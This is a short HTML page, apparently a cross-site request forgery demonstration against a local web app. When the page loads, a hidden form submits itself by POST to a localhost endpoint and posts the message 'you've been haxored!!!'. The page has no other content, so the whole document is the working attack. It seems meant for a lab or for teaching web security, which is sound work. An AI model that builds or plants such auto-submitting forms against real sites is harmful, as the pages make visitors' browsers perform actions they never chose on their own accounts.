<body onload="document.forms[0].submit()">
	<form action="http://localhost:8080/index" method="POST">
		<input type="hidden" name="post" value="you've been haxored!!!"/>
		<input type="submit" name="submitbtn" value="Click me!"/>
	</form>
</body>